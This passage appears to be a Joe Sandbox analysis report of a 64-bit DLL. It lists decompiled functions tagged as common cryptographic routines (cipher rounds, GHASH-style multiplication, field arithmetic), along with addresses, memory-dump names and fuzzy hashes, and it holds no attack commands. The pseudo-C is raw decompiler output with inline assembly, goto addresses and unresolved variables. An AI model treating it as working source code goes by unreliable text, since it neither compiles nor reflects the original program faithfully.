			E000007FE7FEF30E6A90(void* __edx, void* __rcx, signed long long __rsi, long long __rbp, void* __r8, unsigned long long __r10, long long __r14, long long _a16, signed long long _a32) {
				long long _v24;
				signed int _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				char _v72;
				signed long long _v96;
				long long _v104;
				signed long long _v128;
				void* _v136;
				void* __rbx;
				void* __rdi;
				void* _t37;
				signed long long _t53;
				void* _t70;
				void* _t84;
				signed long long _t87;
				signed long long _t92;
				void* _t93;
				void* _t98;
				signed long long _t99;
				unsigned long long _t101;

				_t101 = __r10;
				_t93 = __r8;
				_t87 = __rsi;
				_t53 =  *0xf319c428; // 0x2fa980d671f5
				_v40 = _t53 ^ _t92;
				_t84 = __r8;
				if (__edx == 0x80) goto 0xf30e6ad9;
				if (__edx == 0x100) goto 0xf30e6ac9;
				goto 0xf30e6c28;
				E000007FE7FEF30E7400(__edx - 0x100, _t70, __r8, __rcx, __r8, __rsi, _t98);
				goto 0xf30e6c26;
				_a16 = __rbp;
				_a32 = _t87;
				_v24 = __r14;
				 *((intOrPtr*)(_t93 + 0xf0)) = 0xa;
				_t37 = E000007FE7FEF30E6C50(_t70,  &_v72);
				asm("movups xmm0, [esp+0x60]");
				asm("movups [edi], xmm0");
				_v136 = _v72;
				asm("xorps xmm0, xmm0");
				asm("xorps xmm1, xmm1");
				_v104 = _v64;
				_v128 = _t87;
				asm("movdqa [esp+0x30], xmm0");
				_v96 = _t87;
				asm("movdqa [esp+0x50], xmm1");
				E000007FE7FEF30E7CD0(E000007FE7FEF30E7810(E000007FE7FEF30E7CD0(_t37, _t70,  &_v136, _t84 + 0x10, _t87, 0),  &_v136), _t70,  &_v136, _t84 + 0x10, _t87, 0);
				_t99 = _t87;
				r10d =  *(_t70 + 0x7fef315f92f) & 0x000000ff;
				_v56 = _v136;
				_v48 = _v104;
				_t82 =  *(_t92 + 0x70 + _t99 * 8);
				r8d = r8d & 0x0000000f;
				 *(_t92 + 0x60 + _t99 * 8) = (((_t101 >> (r9b & 0xffffffff) << 0x00000002 ^ ( *(_t92 + 0x70 + _t99 * 8) >> 0x00000010 | _t82 & 0x00000000) >> 0x00000024 ^  *(_t92 + 0x60 + _t99 * 8)) << 0x00000010 ^ _t101 >> (r9b & 0xffffffff) << 0x00000002 ^ ( *(_t92 + 0x70 + _t99 * 8) >> 0x00000010 | _t82 & 0x00000000) >> 0x00000024 ^  *(_t92 + 0x60 + _t99 * 8)) << 0x00000010 ^ _t101 >> (r9b & 0xffffffff) << 0x00000002 ^ ( *(_t92 + 0x70 + _t99 * 8) >> 0x00000010 | _t82 & 0x00000000) >> 0x00000024 ^  *(_t92 + 0x60 + _t99 * 8)) << 0x00000010 ^ _t101 >> (r9b & 0xffffffff) << 0x00000002 ^ ( *(_t92 + 0x70 + _t99 * 8) >> 0x00000010 | _t82 & 0x00000000) >> 0x00000024 ^  *(_t92 + 0x60 + _t99 * 8);
				if (_t99 + 1 - 2 < 0) goto 0xf30e6ba0;
				asm("movups xmm0, [esp+0x60]");
				asm("movups [edi], xmm0");
				if (_t70 + 1 - 0xa <= 0) goto 0xf30e6b30;
				return E000007FE7FEF30F1360(0, (r9b & 0xffffffff) << 2, _v40 ^ _t92);
			}

0x7fef30e6a90
0x7fef30e6a90
0x7fef30e6a90
0x7fef30e6a9a
0x7fef30e6aa4
0x7fef30e6aac
0x7fef30e6ab5
0x7fef30e6abd
0x7fef30e6ac4
0x7fef30e6acf
0x7fef30e6ad4
0x7fef30e6ad9
0x7fef30e6ae4
0x7fef30e6af1
0x7fef30e6af9
0x7fef30e6b04
0x7fef30e6b09
0x7fef30e6b24
0x7fef30e6b3a
0x7fef30e6b3f
0x7fef30e6b47
0x7fef30e6b4a
0x7fef30e6b4f
0x7fef30e6b54
0x7fef30e6b5a
0x7fef30e6b5f
0x7fef30e6b79
0x7fef30e6b83
0x7fef30e6b86
0x7fef30e6b8c
0x7fef30e6b96
0x7fef30e6ba0
0x7fef30e6bc3
0x7fef30e6be7
0x7fef30e6bf3
0x7fef30e6bf5
0x7fef30e6bfd
0x7fef30e6c08
0x7fef30e6c41

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 232a17169e7bbfc7b79a9204a4a37c6e7c56979efd9d10702e37a7316fb7fdd1
Instruction ID: c82010808b7148060c0ab5e004da20dd65cd93b8ddcb921f9039810b463e8852
Opcode Fuzzy Hash: 232a17169e7bbfc7b79a9204a4a37c6e7c56979efd9d10702e37a7316fb7fdd1
Instruction Fuzzy Hash: 5741B732B18B8486E7A09B25F4513AEB3A5F389784F545222EBCC13B66DF7CD195DB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EB600 Relevance: .1, Instructions: 93
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30EB600(signed int __ebx, signed int __edx, signed int __edi, signed int __esi, signed int __ebp, void* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24, long long _a32) {
				signed int _t40;
				signed int _t44;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = __rdi;
				r10d = r10d & 0x03ffffff;
				r14d = r14d & 0x01ffffff;
				r11d = r11d & 0x03ffffff;
				r9d = r9d & 0x01ffffff;
				__rcx[5] = __ebx & 0x01ffffff;
				r8d = r8d & 0x03ffffff;
				__rcx[3] = __esi & 0x01ffffff;
				__rcx[4] = __edi & 0x03ffffff;
				__rcx[6] = r11d;
				__rcx[7] = r9d;
				__rcx[8] = r8d;
				_t44 =  *(__rdx + 0x24) * 0x13 + r10d;
				r14d = r14d + (_t44 >> 0x1a);
				 *__rcx = _t44 & 0x03ffffff;
				r14d = r14d >> 0x19;
				_t40 = r14d & 0x01ffffff;
				__rcx[1] = _t40;
				__rcx[9] = __edx & 0x01ffffff;
				__rcx[2] = (__ebp & 0x03ffffff) + r14d;
				return _t40;
			}

0x7fef30eb600
0x7fef30eb605
0x7fef30eb60a
0x7fef30eb60f
0x7fef30eb631
0x7fef30eb64c
0x7fef30eb6cf
0x7fef30eb6ea
0x7fef30eb705
0x7fef30eb70e
0x7fef30eb71c
0x7fef30eb723
0x7fef30eb72e
0x7fef30eb732
0x7fef30eb736
0x7fef30eb73a
0x7fef30eb748
0x7fef30eb74b
0x7fef30eb751
0x7fef30eb758
0x7fef30eb763
0x7fef30eb767
0x7fef30eb76b
0x7fef30eb782

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8815adf6650d9eea1c21ba1629533aad2b62684f5b1349cd35d56893791af888
Instruction ID: f37c181ddfaed63b8f2d930200515b95d68ac2eba270ffb6c2262c85a0c7f03f
Opcode Fuzzy Hash: 8815adf6650d9eea1c21ba1629533aad2b62684f5b1349cd35d56893791af888
Instruction Fuzzy Hash: 7C31C6B3B227188B8B44CF09E5C0948B7D9F3A579030A5326EAAD9B7D1E778D5518B40

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E7B70 Relevance: .1, Instructions: 92
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E000007FE7FEF30E7B70(signed int __rbx, signed long long* __rcx, unsigned int* __rdx, void* __rdi, long long __rsi, long long __rbp, void* __r8, signed int __r14, long long __r15, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v24;
				void* _t49;
				signed long long _t75;
				long long _t86;
				signed long long _t87;
				signed long long _t88;
				signed long long _t95;
				signed long long _t99;
				signed long long _t103;
				signed long long _t107;
				signed long long _t111;
				signed long long _t115;
				signed long long _t119;
				signed long long _t137;
				signed long long _t139;
				long long _t144;
				signed long long _t145;
				signed long long _t146;
				long long _t150;
				signed long long _t151;
				signed long long _t152;
				long long _t156;
				signed long long _t172;
				signed long long _t175;
				signed long long _t181;
				signed long long _t183;
				signed long long _t190;
				signed long long _t191;
				signed long long _t195;
				long long _t197;

				_push(__rbx);
				asm("xorps xmm0, xmm0");
				asm("movups [ecx], xmm0");
				asm("movups [ecx+0x10], xmm0");
				asm("movups [ecx+0x20], xmm0");
				asm("movups [ecx+0x30], xmm0");
				if (__r8 == 0) goto 0xf30e7cb9;
				_a8 = __rbp;
				_a16 = __rsi;
				_a24 = __r14;
				r14d = 0xffff0000;
				_v24 = __r15;
				_t167 = (( *__rdx >> 0x00000004 ^  *__rdx) & 0x00f000f0) << 0x00000004 ^ ( *__rdx >> 0x00000004 ^  *__rdx) & 0x00f000f0 ^ _t121;
				_t126 =  *( &(__rdx[4]) - 8);
				_t168 = (( *__rdx >> 0x00000004 ^  *__rdx) & 0x00f000f0) << 0x00000004 ^ ( *__rdx >> 0x00000004 ^  *__rdx) & 0x00f000f0 ^ _t121 ^ ((_t167 >> 0x00000008 ^ _t167) & 0x0000ff00) << 0x00000008 ^ (_t167 >> 0x00000008 ^ _t167) & 0x0000ff00;
				_t181 = (( *( &(__rdx[4]) - 8) >> 0x00000004 ^ _t126) & 0x00f000f0) << 0x00000004 ^ ( *( &(__rdx[4]) - 8) >> 0x00000004 ^ _t126) & 0x00f000f0 ^ _t126 ^ ((((( *( &(__rdx[4]) - 8) >> 0x00000004 ^ _t126) & 0x00f000f0) << 0x00000004 ^ ( *( &(__rdx[4]) - 8) >> 0x00000004 ^ _t126) & 0x00f000f0 ^ _t126) >> 0x00000008 ^ _t180) & 0x0000ff00) << 0x00000008 ^ (((( *( &(__rdx[4]) - 8) >> 0x00000004 ^ _t126) & 0x00f000f0) << 0x00000004 ^ ( *( &(__rdx[4]) - 8) >> 0x00000004 ^ _t126) & 0x00f000f0 ^ _t126) >> 0x00000008 ^ _t180) & 0x0000ff00;
				_t75 = (_t181 >> 0x00000010 ^ _t181) & __r14;
				_t49 = r10d;
				_t172 = _t75 << 0x00000010 ^ _t75 ^ _t181;
				 *(__rcx + 0x20 + __rbx * 8) = (((((( *__rdx >> 0x00000004 ^  *__rdx) & 0x00f000f0) << 0x00000004 ^ ( *__rdx >> 0x00000004 ^  *__rdx) & 0x00f000f0 ^ _t121 ^ ((_t167 >> 0x00000008 ^ _t167) & 0x0000ff00) << 0x00000008 ^ (_t167 >> 0x00000008 ^ _t167) & 0x0000ff00) >> 0x00000010 ^ _t168) & __r14) << 0x00000010 ^ (((( *__rdx >> 0x00000004 ^  *__rdx) & 0x00f000f0) << 0x00000004 ^ ( *__rdx >> 0x00000004 ^  *__rdx) & 0x00f000f0 ^ _t121 ^ ((_t167 >> 0x00000008 ^ _t167) & 0x0000ff00) << 0x00000008 ^ (_t167 >> 0x00000008 ^ _t167) & 0x0000ff00) >> 0x00000010 ^ _t168) & __r14 ^ _t168) >> 0x00000020 | _t172 & 0x00000000;
				__rcx[__rbx] = _t172 << 0x00000020 | _t75;
				if (__rbx + 1 - __r8 < 0) goto 0xf30e7bd2;
				_t197 = _a24;
				_t150 = _a16;
				_t156 = _a8;
				_pop(_t144);
				_pop(_t86);
				goto L1;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_a8 = _t86;
				_a16 = _t156;
				_a24 = _t150;
				_a32 = _t144;
				_push(_t197);
				_t151 = __rcx[1];
				_t87 = __rcx[3];
				_t145 = __rcx[5];
				_t190 = __rcx[7];
				_t137 = ( *__rcx >> 0x00000001 ^ _t151) & 0x55555555;
				_t152 = _t151 ^ _t137;
				_t195 = _t137 + _t137 ^  *__rcx;
				_t95 = (__rcx[2] >> 0x00000001 ^ _t87) & 0x55555555;
				_t88 = _t87 ^ _t95;
				_t175 = _t95 + _t95 ^ __rcx[2];
				_t99 = (__rcx[4] >> 0x00000001 ^ _t145) & 0x55555555;
				_t146 = _t145 ^ _t99;
				_t183 = _t99 + _t99 ^ __rcx[4];
				_t103 = (__rcx[6] >> 0x00000001 ^ _t190) & 0x55555555;
				_t191 = _t190 ^ _t103;
				_t139 = _t103 + _t103 ^ __rcx[6];
				_t107 = (_t195 >> 0x00000002 ^ _t175) & 0x33333333;
				__rcx[2] = _t175 ^ _t107;
				 *__rcx = _t107 * 0x00000004 ^ _t195;
				_t111 = (_t152 >> 0x00000002 ^ _t88) & 0x33333333;
				__rcx[3] = _t88 ^ _t111;
				_t115 = (_t183 >> 0x00000002 ^ _t139) & 0x33333333;
				__rcx[1] = _t111 * 0x00000004 ^ _t152;
				__rcx[6] = _t139 ^ _t115;
				__rcx[4] = _t115 * 0x00000004 ^ _t183;
				_t119 = (_t146 >> 0x00000002 ^ _t191) & 0x33333333;
				__rcx[5] = _t119 * 0x00000004 ^ _t146;
				__rcx[7] = _t191 ^ _t119;
				return _t49;
			}

0x7fef30e7b70
0x7fef30e7b77
0x7fef30e7b82
0x7fef30e7b85
0x7fef30e7b89
0x7fef30e7b8d
0x7fef30e7b94
0x7fef30e7b9a
0x7fef30e7ba9
0x7fef30e7bb8
0x7fef30e7bbd
0x7fef30e7bc3
0x7fef30e7bf0
0x7fef30e7c0a
0x7fef30e7c0e
0x7fef30e7c5c
0x7fef30e7c69
0x7fef30e7c76
0x7fef30e7c79
0x7fef30e7c90
0x7fef30e7c95
0x7fef30e7c9f
0x7fef30e7caa
0x7fef30e7caf
0x7fef30e7cb4
0x7fef30e7cbd
0x7fef30e7cbe
0x7fef30e7cbf
0x7fef30e7cc4
0x7fef30e7cc5
0x7fef30e7cc6
0x7fef30e7cc7
0x7fef30e7cc8
0x7fef30e7cc9
0x7fef30e7cca
0x7fef30e7ccb
0x7fef30e7ccc
0x7fef30e7ccd
0x7fef30e7cce
0x7fef30e7ccf
0x7fef30e7cd0
0x7fef30e7cd5
0x7fef30e7cda
0x7fef30e7cdf
0x7fef30e7ce4
0x7fef30e7ce6
0x7fef30e7cfa
0x7fef30e7d01
0x7fef30e7d08
0x7fef30e7d0c
0x7fef30e7d0f
0x7fef30e7d16
0x7fef30e7d23
0x7fef30e7d26
0x7fef30e7d31
0x7fef30e7d3b
0x7fef30e7d3e
0x7fef30e7d49
0x7fef30e7d53
0x7fef30e7d60
0x7fef30e7d6a
0x7fef30e7d75
0x7fef30e7d7b
0x7fef30e7d94
0x7fef30e7d97
0x7fef30e7d9d
0x7fef30e7dc0
0x7fef30e7dc3
0x7fef30e7dca
0x7fef30e7de3
0x7fef30e7de7
0x7fef30e7e02
0x7fef30e7e06
0x7fef30e7e0c

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d35e77222d439f4c89de82e3888517fe1bb6498e16454e6a1537c8a91cf2e716
Instruction ID: f6bbca8559944e18a246667dc3d08442d3903aa29113fa0aae866f3418eed556
Opcode Fuzzy Hash: d35e77222d439f4c89de82e3888517fe1bb6498e16454e6a1537c8a91cf2e716
Instruction Fuzzy Hash: 7721F4D2B24BC843FA508B666D11296A262F749FC4F10F632DF5C1BB1ADB3CE291D200

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF306514D Relevance: .1, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF306514D(signed long long __rax, signed int* __rcx, signed int __rdx, signed long long __r8) {
				void* _v72;
				signed int _t5;
				signed int _t6;
				signed int _t7;
				void* _t8;
				void* _t9;
				signed long long _t11;
				signed long long _t21;
				signed long long _t32;
				signed long long* _t35;
				signed long long _t37;
				signed long long _t39;
				signed long long _t47;
				signed long long _t69;
				signed long long _t71;

				_t11 = __rax;
				_t47 = __r8;
				_v72 = __rcx;
				_t37 = __r8;
				_t6 = E000007FE7FEF306524D(_t5, _t9,  *__rcx, __r8);
				_t71 = _t11;
				_t7 = E000007FE7FEF306524D(_t6, _t9, __rcx[2], __rdx);
				_t21 = _t11;
				_t39 = _t47 ^ __rdx;
				_t8 = E000007FE7FEF306524D(_t7, _t9, __rcx[2] ^  *__rcx, _t39);
				_t69 = _t37 ^ _t71;
				_t32 = _t69 ^ _t21 ^ _t11;
				_t17 = _t71 << 0x00000039 ^ _t71 << 0x0000003e ^ _t71 << 0x0000003f ^ _t32;
				_t35 = _v72;
				 *_t35 = __rdx ^ _t21 ^ _t39 ^ _t71 >> 0x00000001 ^ _t69 ^ _t71 >> 0x00000007 ^ _t71 >> 0x00000002 ^ _t32 << 0x0000003f ^ _t32 << 0x00000039 ^ _t32 << 0x0000003e;
				_t35[1] = (_t71 << 0x00000039 ^ _t71 << 0x0000003e ^ _t71 << 0x0000003f ^ _t32) >> 0x00000007 ^ (_t71 << 0x00000039 ^ _t71 << 0x0000003e ^ _t71 << 0x0000003f ^ _t32) >> 0x00000002 ^ (_t71 << 0x00000039 ^ _t71 << 0x0000003e ^ _t71 << 0x0000003f ^ _t32) >> 0x00000001 ^ _t17 ^ __rdx;
				return _t8;
			}

0x7fef306514d
0x7fef306515d
0x7fef3065166
0x7fef3065171
0x7fef3065174
0x7fef3065179
0x7fef3065189
0x7fef306518e
0x7fef306519d
0x7fef30651a0
0x7fef30651a5
0x7fef30651b1
0x7fef30651cf
0x7fef3065230
0x7fef3065235
0x7fef3065238
0x7fef306524c

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27b98a4cfd0a807992f6d7c0f39b8317eba93bd34331632907f6a1d44d048bd4
Instruction ID: 4b1a331ffa1cfa6998c37caf00f7df962c4c7dbd27019c86442f223f4867ec64
Opcode Fuzzy Hash: 27b98a4cfd0a807992f6d7c0f39b8317eba93bd34331632907f6a1d44d048bd4
Instruction Fuzzy Hash: A511E2527056A98B7A44AAF36D3A99792823359FD4B4CB032EE6C6BF58DC3CD043D240

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E6D50 Relevance: .1, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E000007FE7FEF30E6D50(long long __rbx, signed int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, signed int* __r8) {
				void* _t93;
				void* _t96;
				void* _t98;
				void* _t99;
				signed int* _t126;
				signed long long _t134;
				signed int* _t137;
				signed int* _t138;
				long long _t143;
				void* _t147;
				void* _t148;
				void* _t151;
				signed long long _t152;

				 *((long long*)(_t147 + 0x18)) = __rbx;
				 *((long long*)(_t147 + 0x20)) = __rsi;
				_t148 = _t147 - 0x20;
				_t126 = __r8;
				 *__r8 =  *__r8 ^  *__rcx;
				_t152 = __rdx;
				__r8[2] = __r8[2] ^ __rcx[2];
				__r8[4] = __r8[4] ^ __rcx[4];
				__r8[6] = __r8[6] ^ __rcx[6];
				__r8[8] = __r8[8] ^ __rcx[8];
				__r8[0xa] = __r8[0xa] ^ __rcx[0xa];
				__r8[0xc] = __r8[0xc] ^ __rcx[0xc];
				__r8[0xe] = __r8[0xe] ^ __rcx[0xe];
				_t99 = __rdx - 1;
				if (_t99 <= 0) goto 0xf30e6e2b;
				 *((long long*)(_t148 + 0x30)) = _t143;
				 *((long long*)(_t148 + 0x38)) = __rdi;
				_t137 =  &(__rcx[0x14]);
				_t96 = E000007FE7FEF30E7100(E000007FE7FEF30E7640(E000007FE7FEF30E7810(_t93, __r8), _t126, _t126, _t137, _t151), _t126);
				_t138 =  &(_t137[0x10]);
				 *_t126 =  *_t126 ^  *(_t137 - 0x10);
				_t126[2] = _t126[2] ^  *(_t138 - 0x48);
				_t126[4] = _t126[4] ^  *(_t138 - 0x40);
				_t126[6] = _t126[6] ^  *(_t138 - 0x38);
				_t126[8] = _t126[8] ^  *(_t138 - 0x30);
				_t126[0xa] = _t126[0xa] ^  *(_t138 - 0x28);
				_t126[0xc] = _t126[0xc] ^  *(_t138 - 0x20);
				_t126[0xe] = _t126[0xe] ^  *(_t138 - 0x18);
				if (_t99 != 0) goto 0xf30e6dc0;
				_t98 = E000007FE7FEF30E7640(E000007FE7FEF30E7810(_t96, _t126), _t126, _t126,  *((intOrPtr*)(_t148 + 0x38)));
				_t134 = _t152 * 8;
				 *_t126 =  *_t126 ^  *(__rcx + _t134 * 8);
				_t126[2] = _t126[2] ^  *(__rcx + 8 + _t134 * 8);
				_t126[4] = _t126[4] ^  *(__rcx + 0x10 + _t134 * 8);
				_t126[6] = _t126[6] ^  *(__rcx + 0x18 + _t134 * 8);
				_t126[8] = _t126[8] ^  *(__rcx + 0x20 + _t134 * 8);
				_t126[0xa] = _t126[0xa] ^  *(__rcx + 0x28 + _t134 * 8);
				_t126[0xc] = _t126[0xc] ^  *(__rcx + 0x30 + _t134 * 8);
				_t126[0xe] = _t126[0xe] ^  *(__rcx + 0x38 + _t134 * 8);
				return _t98;
			}

0x7fef30e6d50
0x7fef30e6d55
0x7fef30e6d5c
0x7fef30e6d63
0x7fef30e6d66
0x7fef30e6d69
0x7fef30e6d73
0x7fef30e6d7b
0x7fef30e6d83
0x7fef30e6d8b
0x7fef30e6d93
0x7fef30e6d9b
0x7fef30e6da3
0x7fef30e6da7
0x7fef30e6dab
0x7fef30e6dad
0x7fef30e6db6
0x7fef30e6dbb
0x7fef30e6dd3
0x7fef30e6ddc
0x7fef30e6de0
0x7fef30e6de7
0x7fef30e6def
0x7fef30e6df7
0x7fef30e6dff
0x7fef30e6e07
0x7fef30e6e0f
0x7fef30e6e17
0x7fef30e6e1f
0x7fef30e6e36
0x7fef30e6e3b
0x7fef30e6e47
0x7fef30e6e4f
0x7fef30e6e58
0x7fef30e6e61
0x7fef30e6e6a
0x7fef30e6e73
0x7fef30e6e7c
0x7fef30e6e85
0x7fef30e6e99

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 557a92b05f0ac7cbc48552e2e8ef3f041f87a11dc0e3dfde089e5ba0f29d0139
Instruction ID: ab1b5e655f3c3b9ea3e251803600d656ad4fa5f8fa67d2283dc5745cbbaa48e0
Opcode Fuzzy Hash: 557a92b05f0ac7cbc48552e2e8ef3f041f87a11dc0e3dfde089e5ba0f29d0139
Instruction Fuzzy Hash: 4A417672615F088ACB989F2AE58021E73E8F70CF9CBA55126DB4E97724EF75D4A1C340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3064FDE Relevance: .1, Instructions: 80
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E000007FE7FEF3064FDE(signed int* __rcx, signed int __rdx, signed int __r8) {
				char _v32;
				void* _t13;
				signed long long _t22;
				signed long long* _t24;
				signed long long _t27;

				_t22 = __rdx ^  *__rcx;
				 *__rcx = _t22;
				_t27 = __r8 ^ __rcx[2];
				__rcx[2] = _t27;
				if (( *0xf319cfcb & 0x00000001) == 0) goto 0xf3065007;
				if (( *0xf319cfcc & 0x00000002) != 0) goto 0xf306504a;
				asm("dec eax");
				asm("dec ecx");
				_t24 =  &_v32;
				 *_t24 = _t27;
				_t24[1] = _t22;
				_t13 = E000007FE7FEF306514D(__rcx[0xa], _t24, __rcx[8], __rcx[0xa]);
				asm("dec eax");
				asm("dec eax");
				 *__rcx = _t24[1];
				__rcx[2] =  *_t24;
				return _t13;
			}

0x7fef3064fe7
0x7fef3064fea
0x7fef3064fed
0x7fef3064ff1
0x7fef3064ffc
0x7fef3065005
0x7fef306500b
0x7fef306500e
0x7fef3065015
0x7fef306501a
0x7fef306501d
0x7fef306502a
0x7fef3065036
0x7fef3065039
0x7fef306503c
0x7fef306503f
0x7fef3065049

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b95e064c4376c03cbb71bf29443ee106415537090ae077f336ee1fc2e74e97
Instruction ID: a738aadaee8b0a1968e922de746b0a14b57d1d499723b55f6d65ff2b70cad0ea
Opcode Fuzzy Hash: e7b95e064c4376c03cbb71bf29443ee106415537090ae077f336ee1fc2e74e97
Instruction Fuzzy Hash: 613187B6C14F9941E713973DA846255A750AFA7788B20D313EEEC36B64F728F1D1A210

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30EB1D0 Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30EB1D0(long long __rbx, signed int* __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24, long long _a32) {
				signed int _t32;
				signed int _t35;
				signed int _t38;
				signed int _t42;
				signed int _t46;
				signed int _t50;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = __rdi;
				r8d =  *__rdx;
				r15d = r8d;
				r8d = r8d & 0x03ffffff;
				r15d = r15d >> 0x1a;
				r15d = r15d + __rdx[1];
				r14d = r15d;
				r15d = r15d & 0x01ffffff;
				r14d = r14d >> 0x19;
				r14d = r14d + __rdx[2];
				r14d = r14d & 0x03ffffff;
				_t50 = (r14d >> 0x1a) + __rdx[3];
				_t46 = (_t50 >> 0x19) + __rdx[4];
				_t42 = (_t46 >> 0x1a) + __rdx[5];
				_t35 = (_t42 >> 0x19) + __rdx[6];
				r11d = _t35;
				r11d = r11d >> 0x1a;
				r11d = r11d + __rdx[7];
				r10d = r11d;
				r11d = r11d & 0x01ffffff;
				r10d = r10d >> 0x19;
				r10d = r10d + __rdx[8];
				r9d = r10d;
				r10d = r10d & 0x03ffffff;
				r9d = r9d >> 0x1a;
				r9d = r9d + __rdx[9];
				__rcx[3] = _t50 & 0x01ffffff;
				__rcx[4] = _t46 & 0x03ffffff;
				__rcx[5] = _t42 & 0x01ffffff;
				_t38 = (r9d >> 0x19) * 0x13 + r8d;
